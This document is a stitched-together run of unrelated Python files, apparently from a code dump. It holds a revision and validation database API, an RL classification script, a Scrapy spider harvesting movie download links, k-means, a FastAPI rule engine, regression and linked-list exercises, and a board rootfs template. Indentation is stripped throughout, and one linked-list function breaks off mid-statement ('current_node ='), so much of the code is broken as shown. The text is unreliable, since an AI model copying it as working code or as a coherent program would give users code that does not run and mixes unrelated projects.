# NOTE(fmontei): While cascade should delete all data from all tables,
# we also need to reset the index to 1 for each table.
for table in ['buckets', 'revisions', 'revision_tags', 'documents',
'validations']:
engine.execute(
text("TRUNCATE TABLE %s RESTART IDENTITY CASCADE;" % table)
.execution_options(autocommit=True))
else:
raw_query("DELETE FROM revisions;")
@require_revision_exists
def revision_documents_get(revision_id=None, include_history=True,
unique_only=True, session=None, **filters):
"""Return the documents that match filters for the specified `revision_id`.
:param revision_id: The ID corresponding to the ``Revision`` object. If the
ID is ``None``, then retrieve the latest revision, if one exists.
:param include_history: Return all documents for revision history prior
and up to current revision, if ``True``. Default is ``True``.
:param unique_only: Return only unique documents if ``True``. Default is
``True``.
:param session: Database session object.
:param filters: Key-value pairs used for filtering out revision documents.
:returns: All revision documents for ``revision_id`` that match the
``filters``, including document revision history if applicable.
:raises RevisionNotFound: if the revision was not found.
"""
session = session or get_session()
revision_documents = []
try:
if revision_id:
revision = session.query(models.Revision)\
.filter_by(id=revision_id)\
.one()
else:
# If no revision_id is specified, grab the latest one.
revision = session.query(models.Revision)\
.order_by(models.Revision.created_at.desc())\
.first()
if revision:
revision_documents = revision.to_dict()['documents']
if include_history:
relevant_revisions = session.query(models.Revision)\
.filter(models.Revision.created_at < revision.created_at)\
.order_by(models.Revision.created_at)\
.all()
# Include documents from older revisions in response body.
for relevant_revision in relevant_revisions:
revision_documents.extend(
relevant_revision.to_dict()['documents'])
except sa_orm.exc.NoResultFound:
raise errors.RevisionNotFound(revision_id=revision_id)
revision_documents = _update_revision_history(revision_documents)
filtered_documents = eng_utils.filter_revision_documents(
revision_documents, unique_only, **filters)
return filtered_documents
####################
@require_revision_exists
def revision_tag_create(revision_id, tag, data=None, session=None):
"""Create a revision tag.
If a tag already exists by name ``tag``, the request is ignored.
:param revision_id: ID corresponding to ``Revision`` DB object.
:param tag: Name of the revision tag.
:param data: Dictionary of data to be associated with tag.
:param session: Database session object.
:returns: The tag that was created if not already present in the database,
else None.
:raises RevisionTagBadFormat: If data is neither None nor dictionary.
"""
session = session or get_session()
tag_model = models.RevisionTag()
if data is None:
data = {}
if data and not isinstance(data, dict):
raise errors.RevisionTagBadFormat(data=data)
try:
with session.begin():
tag_model.update(
{'tag': tag, 'data': data, 'revision_id': revision_id})
tag_model.save(session=session)
resp = tag_model.to_dict()
except db_exception.DBDuplicateEntry:
# Update the revision tag if it already exists.
LOG.debug('Tag %s already exists for revision_id %s. Attempting to '
'update the entry.', tag, revision_id)
try:
tag_to_update = session.query(models.RevisionTag)\
.filter_by(tag=tag, revision_id=revision_id)\
.one()
except sa_orm.exc.NoResultFound:
raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
tag_to_update.update({'data': data})
tag_to_update.save(session=session)
resp = tag_to_update.to_dict()
return resp
@require_revision_exists
def revision_tag_get(revision_id, tag, session=None):
"""Retrieve tag details.
:param revision_id: ID corresponding to ``Revision`` DB object.
:param tag: Name of the revision tag.
:param session: Database session object.
:returns: None
:raises RevisionTagNotFound: If ``tag`` for ``revision_id`` was not found.
"""
session = session or get_session()
try:
tag = session.query(models.RevisionTag)\
.filter_by(tag=tag, revision_id=revision_id)\
.one()
except sa_orm.exc.NoResultFound:
raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
return tag.to_dict()
@require_revision_exists
def revision_tag_get_all(revision_id, session=None):
"""Return list of tags for a revision.
:param revision_id: ID corresponding to ``Revision`` DB object.
:param tag: Name of the revision tag.
:param session: Database session object.
:returns: List of tags for ``revision_id``, ordered by the tag name by
default.
"""
session = session or get_session()
tags = session.query(models.RevisionTag)\
.filter_by(revision_id=revision_id)\
.order_by(models.RevisionTag.tag)\
.all()
return [t.to_dict() for t in tags]
@require_revision_exists
def revision_tag_delete(revision_id, tag, session=None):
"""Delete a specific tag for a revision.
:param revision_id: ID corresponding to ``Revision`` DB object.
:param tag: Name of the revision tag.
:param session: Database session object.
:returns: None
"""
query = raw_query(
"""DELETE FROM revision_tags WHERE tag=:tag AND
revision_id=:revision_id;""", tag=tag, revision_id=revision_id)
if query.rowcount == 0:
raise errors.RevisionTagNotFound(tag=tag, revision=revision_id)
@require_revision_exists
def revision_tag_delete_all(revision_id, session=None):
"""Delete all tags for a revision.
:param revision_id: ID corresponding to ``Revision`` DB object.
:param session: Database session object.
:returns: None
"""
session = session or get_session()
session.query(models.RevisionTag)\
.filter_by(revision_id=revision_id)\
.delete(synchronize_session=False)
####################
def revision_rollback(revision_id, latest_revision, session=None):
"""Rollback the latest revision to revision specified by ``revision_id``.
Rolls back the latest revision to the revision specified by ``revision_id``
thereby creating a new, carbon-copy revision.
:param revision_id: Revision ID to which to rollback.
:param latest_revision: Dictionary representation of the latest revision
in the system.
:returns: The newly created revision.
"""
session = session or get_session()
latest_revision_docs = revision_documents_get(latest_revision['id'],
session=session)
latest_revision_hashes = [
(d['data_hash'], d['metadata_hash']) for d in latest_revision_docs
]
if latest_revision['id'] == revision_id:
LOG.debug('The revision being rolled back to is the current revision.'
'Expect no meaningful changes.')
if revision_id == 0:
# Delete all existing documents in all buckets
all_buckets = bucket_get_all(deleted=False)
bucket_names = [str(b['name']) for b in all_buckets]
revision = documents_delete_from_buckets_list(bucket_names,
session=session)
return revision.to_dict()
else:
# Sorting the documents so the documents in the new revision are in
# the same order as the previous revision to support stable testing
orig_revision_docs = sorted(revision_documents_get(revision_id,
session=session),
key=lambda d: d['id'])
# A mechanism for determining whether a particular document has changed
# between revisions. Keyed with the document_id, the value is True if
# it has changed, else False.
doc_diff = {}
# List of unique buckets that exist in this revision
unique_buckets = []
for orig_doc in orig_revision_docs:
if ((orig_doc['data_hash'], orig_doc['metadata_hash'])
not in latest_revision_hashes):
doc_diff[orig_doc['id']] = True
else:
doc_diff[orig_doc['id']] = False
if orig_doc['bucket_id'] not in unique_buckets:
unique_buckets.append(orig_doc['bucket_id'])
# We need to find which buckets did not exist at this revision
buckets_to_delete = []
all_buckets = bucket_get_all(deleted=False)
for bucket in all_buckets:
if bucket['id'] not in unique_buckets:
buckets_to_delete.append(str(bucket['name']))
# Create the new revision,
if len(buckets_to_delete) > 0:
new_revision = documents_delete_from_buckets_list(buckets_to_delete,
session=session)
else:
new_revision = models.Revision()
with session.begin():
new_revision.save(session=session)
# No changes have been made between the target revision to rollback to
# and the latest revision.
if set(doc_diff.values()) == set([False]):
LOG.debug('The revision being rolled back to has the same documents '
'as that of the current revision. Expect no meaningful '
'changes.')
# Create the documents for the revision.
for orig_document in orig_revision_docs:
orig_document['revision_id'] = new_revision['id']
orig_document['meta'] = orig_document.pop('metadata')
new_document = models.Document()
new_document.update({x: orig_document[x] for x in (
'name', 'meta', 'layer', 'data', 'data_hash', 'metadata_hash',
'schema', 'bucket_id')})
new_document['revision_id'] = new_revision['id']
# If the document has changed, then use the revision_id of the new
# revision, otherwise use the original revision_id to preserve the
# revision history.
if doc_diff[orig_document['id']]:
new_document['orig_revision_id'] = new_revision['id']
else:
new_document['orig_revision_id'] = revision_id
with session.begin():
new_document.save(session=session)
new_revision = new_revision.to_dict()
new_revision['documents'] = _update_revision_history(
new_revision['documents'])
return new_revision
####################
def _get_validation_policies_for_revision(revision_id, session=None):
session = session or get_session()
# Check if a ValidationPolicy for the revision exists.
validation_policies = document_get_all(
session, revision_id=revision_id, deleted=False,
schema=types.VALIDATION_POLICY_SCHEMA)
if not validation_policies:
# Otherwise return early.
LOG.debug('Failed to find a ValidationPolicy for revision ID %s. '
'Only the "%s" results will be included in the response.',
revision_id, types.DECKHAND_SCHEMA_VALIDATION)
validation_policies = []
return validation_policies
@require_revision_exists
def validation_create(revision_id, val_name, val_data, session=None):
session = session or get_session()
validation_kwargs = {
'revision_id': revision_id,
'name': val_name,
'status': val_data.get('status', None),
'validator': val_data.get('validator', None),
'errors': val_data.get('errors', []),
}
validation = models.Validation()
with session.begin():
validation.update(validation_kwargs)
validation.save(session=session)
return validation.to_dict()
@require_revision_exists
def validation_get_all(revision_id, session=None):
# Query selects only unique combinations of (name, status) from the
# `Validations` table and prioritizes 'failure' result over 'success'
# result via alphabetical ordering of the status column. Each document
# has its own validation but for this query we want to return the result
# of the overall validation for the revision. If just 1 document failed
# validation, we regard the validation for the whole revision as 'failure'.
session = session or get_session()
query = raw_query("""
SELECT DISTINCT name, status FROM validations as v1
WHERE revision_id=:revision_id AND status = (
SELECT status FROM validations as v2
WHERE v2.name = v1.name
ORDER BY status
LIMIT 1
)
GROUP BY name, status
ORDER BY name, status;
""", revision_id=revision_id)
result = {v[0]: v for v in query.fetchall()}
actual_validations = set(v[0] for v in result.values())
validation_policies = _get_validation_policies_for_revision(revision_id)
if not validation_policies:
return result.values()
# TODO(fmontei): Raise error for expiresAfter conflicts for duplicate
# validations across ValidationPolicy documents.
expected_validations = set()
for vp in validation_policies:
expected_validations = expected_validations.union(
list(v['name'] for v in vp['data'].get('validations', [])))
missing_validations = expected_validations - actual_validations
extra_validations = actual_validations - expected_validations
# If an entry in the ValidationPolicy was never POSTed, set its status
# to failure.
for missing_validation in missing_validations:
result[missing_validation] = (missing_validation, 'failure')
# If an entry is not in the ValidationPolicy but was externally registered,
# then override its status to "ignored [{original_status}]".
for extra_validation in extra_validations:
result[extra_validation] = (
extra_validation, 'ignored [%s]' % result[extra_validation][1])
return result.values()
def _check_validation_entries_against_validation_policies(
revision_id, entries, val_name=None, session=None):
session = session or get_session()
result = [e.to_dict() for e in entries]
result_map = {}
for r in result:
result_map.setdefault(r['name'], [])
result_map[r['name']].append(r)
actual_validations = set(v['name'] for v in result)
validation_policies = _get_validation_policies_for_revision(revision_id)
if not validation_policies:
return result
# TODO(fmontei): Raise error for expiresAfter conflicts for duplicate
# validations across ValidationPolicy documents.
expected_validations = set()
for vp in validation_policies:
expected_validations |= set(
v['name'] for v in vp['data'].get('validations', []))
missing_validations = expected_validations - actual_validations
extra_validations = actual_validations - expected_validations
# If an entry in the ValidationPolicy was never POSTed, set its status
# to failure.
for missing_name in missing_validations:
if val_name is None or missing_name == val_name:
result.append({
'id': len(result),
'name': val_name,
'status': 'failure',
'errors': [{
'message': 'The result for this validation was never '
'externally registered so its status defaulted '
'to "failure".'
}]
})
break
# If an entry is not in the ValidationPolicy but was externally registered,
# then override its status to "ignored [{original_status}]".
for extra_name in extra_validations:
for entry in result_map[extra_name]:
original_status = entry['status']
entry['status'] = 'ignored [%s]' % original_status
entry.setdefault('errors', [])
msg_args = eng_utils.meta(vp) + (
', '.join(v['name'] for v in vp['data'].get(
'validations', [])),
)
for vp in validation_policies:
entry['errors'].append({
'message': (
'The result for this validation was externally '
'registered but has been ignored because it is not '
'found in the validations for ValidationPolicy '
'[%s, %s] %s: %s.' % msg_args
)
})
return result
@require_revision_exists
def validation_get_all_entries(revision_id, val_name=None, session=None):
session = session or get_session()
entries = session.query(models.Validation)\
.filter_by(revision_id=revision_id)
if val_name:
entries = entries.filter_by(name=val_name)
entries.order_by(models.Validation.created_at.asc())\
.all()
return _check_validation_entries_against_validation_policies(
revision_id, entries, val_name=val_name, session=session)
@require_revision_exists
def validation_get_entry(revision_id, val_name, entry_id, session=None):
session = session or get_session()
entries = validation_get_all_entries(
revision_id, val_name, session=session)
try:
return entries[entry_id]
except IndexError:
raise errors.ValidationNotFound(
revision_id=revision_id, validation_name=val_name,
entry_id=entry_id)
|
### Ting-Yao Hu, 2016.0
import sys
import os
from sklearn.svm import SVC, LinearSVC
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from myconfig import *
sys.path.append(util_dir)
sys.path.append(early_predict_dir)
sys.path.append(rl_dir)
from util_ml import *
from rl_feature_extraction import *
from q_learning import *
def distance_func(state1,state2):
if state1[-1]!=state2[-1]: return sys.float_info.max
dist = 0
for i in range(len(state1)-1):
dist+=abs(state1[i]-state2[i])
return dist
stepcost = float(sys.argv[1])
#stepcost = 0.1
X_ts = pickle.load(open(feat_dir+'text_seq.pkl'))
X_as = pickle.load(open(feat_dir+'audio_seq.pkl'))
X_vs = pickle.load(open(feat_dir+'video_seq.pkl'))
y = pickle.load(open(feat_dir+'lab.pkl'))
y_dummy = pickle.load(open(feat_dir+'lab.pkl'))
l = pickle.load(open(feat_dir+'length.pkl'))
datanum = X_ts.shape[0]
ls = np.zeros((datanum,1,10))
for idx in range(10):
ls[:,0,idx] = l
maxl = 10
np.random.seed(1234)
ls, y_dummy = RandomPerm(ls,y_dummy)
np.random.seed(1234)
X_as, y_dummy = RandomPerm(X_as,y_dummy)
np.random.seed(1234)
X_vs, y_dummy = RandomPerm(X_vs,y_dummy)
np.random.seed(1234)
X_ts, y = RandomPerm(X_ts,y)
X_avs = np.concatenate((X_as,ls),axis=1)
ypred_total,ytest_total = [],[]
lcount = 0
for Xtrain, ytrain, ltrain, Xtest, ytest, ltest in KFold_withl(X_avs,y,l,5):
#clf = LogisticRegression(C=0.01)
clf = LinearSVC(C=0.01,penalty='l1',dual=False)
hist = score_hist(Xtrain,ytrain,ltrain,clf)
historylst = rl_feature(Xtrain,ytrain,ltrain,clf,hist,stepcost)
mdp = MyMDP(alpha = 0.5, gamma=0.9, iternum = 500)
mdp.init_from_history(historylst)
mdp.q_learn(historylst)
clflst = []
for idx in range(maxl):
#clf = LogisticRegression(C=0.01)
clf = LinearSVC(C=0.01,penalty='l1',dual=False)
clf.fit(Xtrain[:,:,idx],ytrain)
clflst.append(clf)
tsdatanum = Xtest.shape[0]
ypred = []
#classes =
for idx in range(tsdatanum):
X_sample = Xtest[idx,:,:]
test_state_lst = rl_feature_test(X_sample,clflst,ltest[idx],hist)
#print test_state_lst
for jdx, state in enumerate(test_state_lst):
endbool = state[-1]
if mdp.policy(state,distance_func=distance_func)=='y' or endbool or jdx==4:
ypred.append(state[0])
lcount+=jdx+1
print jdx+1
break
print accuracy_score(ypred,ytest)
ypred_total+=ypred
ytest_total+=ytest.tolist()
print lcount
print accuracy_score(ytest_total,ypred_total)
|
# -*- coding: utf-8 -*-
import scrapy
from hao6v.items import Hao6VItem
class Haov6Spider(scrapy.Spider):
name = 'haov6'
allowed_domains = ['hao6v.com']
start_urls = ['http://www.hao6v.com/dy/index.html']
def parse(self,response):
yield scrapy.Request(response.url, callback=self.parse_first)
for page in range(2,265):
link='http://www.hao6v.com/dy/index_{}.html'.format(page)
yield scrapy.Request(link, callback=self.parse_first)
def parse_first(self, d):
items = []
news=d.xpath('//*[@id="main"]/div[1]/div/ul/li')
for new in news:
item=Hao6VItem()
item['url']=new.xpath('./a/@href').extract_first()
items.append(item)
for item in items:
yield scrapy.Request(url=item['url'], callback=self.parse_second)
#print(item['url'])
def parse_second(self, response):
item = Hao6VItem()
#meta_1 = response.meta['meta_1']
item['title'] = response.xpath('//*[@id="main"]/div[1]/div/h1/text()').extract_first()
item['img']=response.xpath('//*[@id="endText"]/p[1]/img/@src').extract_first()
item['downurl']=response.xpath('//*[@id="endText"]/table/tbody/tr[2]/td/a/@href').extract_first()
print(item['downurl'])
if item['downurl'] != None:
yield item
#//*[@id="main"]/div[1]/div/ul/li[1] |
"""
A Python Program thet performs K-Means Clustering, where
the user must specify the number of clusters or k that they desire.
"""
import sys
import random
datafile = sys.argv[1]
f = open(datafile)
data = []
i = 0
l = f.readline()
#Read Data
while (l != ''):
a = l.split()
l2 = []
for j in range(0, len(a), 1):
l2.append(float(a[j]))
data.append(l2)
l = f.readline()
rows = len(data)
cols = len(data[0])
f.close()
k = int(sys.argv[2])
"""
#Read labels
labelfile = sys.argv[2]
f = open(labelfile)
trainlabels = {}
n = [0,0]
l = f.readline()
while(l != ''):
a = l.split()
trainlabels[int(a[1])] = int(a[0])
l = f.readline()
n[int(a[0])] += 1
"""
###create a dictionary to store the cluster that each datapoint joins###
keys = []
for i in range (0,k,1):
keys.append(i)
#cluster = {key: [] for key in keys}
#print(cluster)
###pick k random points to begin the clustering; do this outside the loop###
cluster_list = random.sample(data,k)
print("first cluster list: ",cluster_list)
#print(len(cluster_list))
min_dist_index = 0
converged = False
count = 0
old_cluster_list = []
while (converged == False and count < 500):
count += 1
cluster = {key: [] for key in keys}
# old_cluster_list = cluster_list
print("cluster list for round ", count,": ",cluster_list)
for i in range(0,rows,1):
#for each row of data, calculate the euclidean distance between it and each datapoint in the cluster_list###
euclid_distances = [0]*k
for h in range (0,len(cluster_list), 1):
for j in range(0,cols,1):
euclid_distances[h] += (data[i][j] - cluster_list[h][j])**2
euclid_distances[h] = euclid_distances[h]**0.5
min_dist_index = euclid_distances.index(min(euclid_distances))
cluster[min_dist_index].append(i)
#print("cluster: ", cluster)
index = -1
cluster_list = [0]*k
for value in cluster.values():
index += 1
m = [0]*cols
size = len(value)
for i in range (0,size, 1):
for j in range(0,cols,1):
m[j] += data[int(value[i])][j]
for j in range (0,cols,1):
if (m[j] != 0):
m[j] = m[j]/size
else:
continue
cluster_list[index] = m
# print("clusters after this iteration: ", cluster_list)
if (old_cluster_list != [] and cluster_list == old_cluster_list):
converged = True
print("converged")
else:
old_cluster_list = cluster_list
continue
for i in range (0,rows,1):
index = -1
for value in cluster.values():
index += 1
size = len(value)
for j in range(0,size,1):
if (i == value[j]):
print(index, value[j])
|
with open('input.txt') as f:
adapters = f.read().splitlines()
adapters = list(map(lambda number: int(number), adapters))
adapters.sort()
# for device's adapter
adapters.append(max(adapters) + 3)
differences = {
1: 0,
2: 0,
3: 0
}
prev = 0
for adapter in adapters:
differences[adapter-prev] += 1
prev = adapter
print(differences[1] * differences[3]) |
from typing import Optional
import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
from starlette.staticfiles import StaticFiles
import db
BASE_PATH = "/api"
app = FastAPI()
app.mount("/static", StaticFiles(directory="static"), name="static")
@app.get(BASE_PATH)
async def root():
return {"message": "Hello World"}
# ---------- knowledge ----------
# 知识对象
class Knowledge(BaseModel):
code: Optional[int] = None
name: Optional[str] = None
type: Optional[int] = None
# 添加综合数据库
@app.post(BASE_PATH + "/knowledge/save")
async def knowledge_add(knowledge: Knowledge):
conn = db.conn()
# 如何已经存在就不用再添加了
result = db.select(conn, "select * from t_code where name = ?", (knowledge.name,))
if result is not None:
return {"code": "-1", "message": "the name is already exist, please change a new one"}
db.execute(conn, "insert into t_code(name, type) values (?, ?)", (knowledge.name, knowledge.type))
db.close(conn)
return {"code": "0", "message": "success"}
# 单条查询综合数据库
@app.post(BASE_PATH + "/knowledge/select")
async def knowledge_select(knowledge: Knowledge):
conn = db.conn()
# 查看添加对象是否存在
result = db.select(conn, "select * from t_code where code = ?", (knowledge.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
db.close(conn)
return {"code": "0", "message": "success", "data": {"code": result[0], "name": result[1], "type": result[2]}}
# 更新综合数据库
@app.post(BASE_PATH + "/knowledge/update")
async def knowledge_update(knowledge: Knowledge):
conn = db.conn()
# 查看编辑对象是否存在
result = db.select(conn, "select code from t_code where code = ?", (knowledge.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
temp = db.select(conn, "select code from t_code where name = ?", (knowledge.name,))
if temp is not None and result[0] != temp[0]:
return {"code": "-1", "message": "the name is already exist, pls change a new one"}
db.execute(conn, "update t_code set name = ?, type = ? where code = ? ",
(knowledge.name, knowledge.type, knowledge.code))
db.close(conn)
return {"code": "0", "message": "success"}
# 删除综合数据库
@app.post(BASE_PATH + "/knowledge/delete")
async def knowledge_delete(knowledge: Knowledge):
conn = db.conn()
# 查看添加对象是否存在
result = db.select(conn, "select * from t_code where code = ?", (knowledge.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
db.execute(conn, "delete from t_code where code = ?", (knowledge.code,))
db.close(conn)
return {"code": "0", "message": "success"}
# 查询全部的综合数据库列表
@app.post(BASE_PATH + "/knowledge/all")
async def knowledge_all(knowledge: Knowledge):
conn = db.conn()
# 查询全部代码
params = []
sql = "select * from t_code where 1=1 "
if knowledge.name is not None:
sql += " and name like ? "
params.append("%" + knowledge.name + "%")
if knowledge.type is not None:
sql += " and type = ? "
params.append(knowledge.type)
result = db.many(conn, sql, tuple(params))
rows = []
if result is not None:
for row in result:
rows.append({"code": row[0], "name": row[1], "type": row[2]})
db.close(conn)
return {"code": "0", "message": "success", "data": rows}
# ---------- rule ----------
# 规则对象
class Rule(BaseModel):
code: Optional[int] = None
name: Optional[str] = None
position: Optional[int] = None
type: Optional[int] = None
rule: Optional[str] = None
# 添加规则对象
@app.post(BASE_PATH + "/rule/save")
async def rule_add(rule: Rule):
conn = db.conn()
# 如何已经存在就不用再添加了
result = db.select(conn, "select * from t_rule where name = ?", (rule.name,))
if result is not None:
return {"code": "-1", "message": "the name is already exist, please change a new one"}
db.execute(conn, "insert into t_rule(name, position, type, rule) values (?, ?, ?, ?)",
(rule.name, rule.position, rule.type, rule.rule))
db.close(conn)
return {"code": "0", "message": "success"}
# 单条查询规则对象
@app.post(BASE_PATH + "/rule/select")
async def rule_select(rule: Rule):
conn = db.conn()
# 查看添加对象是否存在
result = db.select(conn, "select * from t_rule where code = ?", (rule.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
db.close(conn)
return {"code": "0", "message": "success",
"data": {"code": result[0], "name": result[1], "position": result[2], "type": result[3], "rule": result[4]}}
# 更新规则对象
@app.post(BASE_PATH + "/rule/update")
async def rule_update(rule: Rule):
conn = db.conn()
# 查看编辑对象是否存在
result = db.select(conn, "select code from t_rule where code = ?", (rule.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
temp = db.select(conn, "select code from t_rule where name = ?", (rule.name,))
if temp is not None and result[0] != temp[0]:
return {"code": "-1", "message": "the name is already exist, pls change a new one"}
db.execute(conn, "update t_rule set name = ?, position = ?, type = ?, rule = ? where code = ? ",
(rule.name, rule.position, rule.type, rule.rule, rule.code))
db.close(conn)
return {"code": "0", "message": "success"}
# 删除规则对象
@app.post(BASE_PATH + "/rule/delete")
async def rule_delete(rule: Rule):
conn = db.conn()
# 查看添加对象是否存在
result = db.select(conn, "select * from t_rule where code = ?", (rule.code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
db.execute(conn, "delete from t_rule where code = ?", (rule.code,))
db.close(conn)
return {"code": "0", "message": "success"}
# 查询全部的综合数据库列表
@app.post(BASE_PATH + "/rule/all")
async def rule_all(rule: Rule):
conn = db.conn()
# 查询全部代码
params = []
sql = "select * from t_rule where 1=1 "
if rule.name is not None:
sql += " and name like ? "
params.append("%" + rule.name + "%")
if rule.type is not None:
sql += " and type = ? "
params.append(rule.type)
sql += " order by position"
result = db.many(conn, sql, tuple(params))
rows = []
if result is not None:
for row in result:
rows.append({"code": row[0], "name": row[1], "position": row[2], "type": row[3], "rule": row[4]})
db.close(conn)
return {"code": "0", "message": "success", "data": rows}
# ---------- process ----------
# 规则对象
class SubmitRule(BaseModel):
rule: str
# 推理机开发
@app.post(BASE_PATH + "/process")
async def process(rule: Rule):
inputs = rule.rule.split("+")
if len(inputs) == 0:
return {"code": "-1", "message": "rule is not correct"}
rules = get_rules()
# python 不支持 do..while, 假定能匹配上
flag = 1
while flag == 1:
flag = match(rules, inputs)
if flag == 2:
data = select_knowledge(inputs[-1])
else:
data = {"code": -1, "name": "无匹配动物", "type": -1}
return {"code": "0", "message": "success", "data": data}
# 进行匹配
def match(rules, inputs):
# 0:未匹配 1:匹配了中间结果 2:匹配到了最终结果
flag = 0
for rule in rules:
array = rule["rule"].split("=")
left = array[0]
right = array[1]
left_array = left.split("+")
# 计数匹配
match_count = 0
# 标记匹配元素的下标,后面好删除
match_index = []
for i, left_value in enumerate(left_array):
for j, value in enumerate(inputs):
# 如果输入值有和规则库中定义一样的
if value == left_value:
match_count = match_count + 1
match_index.append(j)
# 如果有匹配成功的,删除匹配的节点
if match_count == len(left_array):
flag = 1
# 对数据排序
match_index.sort(reverse=True)
for index in match_index:
# 删除逻辑有问题
inputs.pop(index)
# 然后再把匹配的记录加进去
if right not in inputs:
inputs.append(right)
# 判断是不是最终匹配
if rule["type"] == 1:
flag = 2
return flag
# 得到所有的规则
def get_rules():
conn = db.conn()
# 查询全部代码
result = db.many(conn, "select * from t_rule order by position", ())
rows = []
if result is not None:
for row in result:
rows.append({"code": row[0], "name": row[1], "position": row[2], "type": row[3], "rule": row[4]})
db.close(conn)
return rows
# 单条查询规则对象
def select_knowledge(code):
conn = db.conn()
# 查看添加对象是否存在
result = db.select(conn, "select * from t_code where code = ?", (code,))
if result is None:
return {"code": "-1", "message": "record is not exist"}
db.close(conn)
return {"code": result[0], "name": result[1], "type": result[2]}
# 单元测试
def test():
_inputs = "1+9+12".split("+")
# _inputs = "4+19".split("+")
_rules = get_rules()
# python 不支持 do..while, 假定能匹配上
_flag = 1
while _flag == 1:
print("inputs is: " + str(_inputs))
_flag = match(_rules, _inputs)
if _flag == 2:
data = select_knowledge(_inputs[-1])
else:
data = {"code": -1, "name": "无匹配动物", "type": -1}
print(data)
if __name__ == "__main__":
# test()
# 如果需要本地调试,可以通过启用uvicorn方便进行调试
uvicorn.run(app, host="0.0.0.0", port=8000)
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset= pd.read_csv('Position_Salaries.csv')
x=dataset.iloc[:,1:2].values
y=dataset.iloc[:,2].values
#fitting decision tree regression model to dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(x,y)
#predicting
y_pred = regressor.predict([[6.5]])
#visualizing the decision tree regression results
plt.scatter(x,y,color='red')
plt.plot(x, regressor.predict(x), color='blue')
plt.title('Decision Tree Regression Model')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show()
#visualizing the decision tree regression results (for higher resolution)
x_grid=np.arange(min(x), max(x), 0.01)
x_grid= x_grid.reshape((len(x_grid),1))
plt.scatter(x,y,color='red')
plt.plot(x_grid,regressor.predict(x_grid), color='blue')
plt.title('Decision Tree Reg')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show() |
\# from nose.tools import assert_equal
class SingleLinkedList:
def __init__(self, val):
self.value = val
self.next = None
class DoubleLinkedList:
def __init__(self, value):
self.value = value
self.next = None
self.previous = None
def cyclic_check(node):
visited = []
while node.next is not None:
if node.value in visited:
return True
else:
print(node.value)
visited.append(node.value)
node = node.next
return False
# My Solution -
def reverse_singleLinkList(first_node):
print('Reversing the linked list .... ')
nodes = []
print(first_node.value)
nodes.append(first_node)
node = first_node
print('collecting nodes ...')
while node.next is not None:
node = node.next
print(node.value)
nodes.append(node)
print('Reversing')
curr = len(nodes)
print(curr)
while curr != 0:
print('Inside while loop ...')
print(curr)
node = nodes[curr - 1]
print(node.value)
if curr > 1:
print('Inside if .....')
next_node = nodes[curr - 2]
print(next_node.value)
node.next = next_node
curr -= 1
return node
def jose_reverse_ll(head):
current_node = head
# next_node = None
previous_node = None
while current_node:
next_node = current_node.next
current_node.next = previous_node
previous_node = current_node
current_node = next_node
return previous_node
def nth_node_from_last(nth, tail_node):
current_node = tail_node
for curr in xrange(nth):
current_node =
if __name__ == '__main__':
# Single Linked List
a = SingleLinkedList(10)
b = SingleLinkedList(20)
c = SingleLinkedList(30)
a.next = b
b.next = c
# Double Linked List
x = DoubleLinkedList(100)
y = DoubleLinkedList(200)
z = DoubleLinkedList(300)
x.next = y
y.previous = x
y.next = z
z.previous = y
# Cyclic check.
sl1 = SingleLinkedList(10)
sl2 = SingleLinkedList(20)
sl3 = SingleLinkedList(30)
sl4 = SingleLinkedList(40)
sl1.next = sl2
sl2.next = sl3
# sl3.next = sl1
print(cyclic_check(sl4))
|
class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
from itertools import combinations
ans = []
for i in range(1, len(nums) + 1):
newComb = list(combinations(nums, i))
ans += newComb
for i in range(len(ans)):
ans[i] = list(ans[i])
ans.append([])
return ans
|
#MKU, template based rootfs builder for Ubuntu.
#This file is the template for the pandaboard board.
#Copyright (C) 2013 Angelo Compagnucci <angelo.compagnucci@gmail.com>
#Copyright (C) 2013 Daniele Accattoli <d.acca87@gmail.com>
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# NOTE: the Kernel in this repository don't have the driver for USB EHCI
# Boot script
BOOTCMD="""fatload mmc 0:1 0x80000000 uImage
setenv bootargs rw vram=32M fixrtc mem=1G@0x80000000 root=/dev/mmcblk0p2 console=ttyO2,115200n8 rootwait
bootm 0x80000000
"""
# Serial Console Script
SERIAL_CONSOLE_SCRIPT="""for arg in $(cat /proc/cmdline)
do
case $arg in
console=*)
tty=${arg#console=}
tty=${tty#/dev/}
case $tty in
tty[a-zA-Z]* )
PORT=${tty%%,*}
# check for service which do something on this port
if [ -f /etc/init/$PORT.conf ];then continue;fi
tmp=${tty##$PORT,}
SPEED=${tmp%%n*}
BITS=${tmp##${SPEED}n}
# 8bit serial is default
[ -z $BITS ] && BITS=8
[ 8 -eq $BITS ] && GETTY_ARGS="$GETTY_ARGS -8 "
[ -z $SPEED ] && SPEED='115200,57600,38400,19200,9600'
GETTY_ARGS="$GETTY_ARGS $SPEED $PORT"
exec /sbin/getty $GETTY_ARGS
esac
esac
done
"""
CONSOLE="""
start on runlevel [23]
stop on runlevel [!23]
respawn
exec /sbin/getty 115200 ttyO2
"""
#exec /bin/sh /bin/serial-console
PRECISE_MLO_URL = "http://ports.ubuntu.com/ubuntu-ports/dists/precise/main/installer-armhf/current/images/omap4/netboot/MLO"
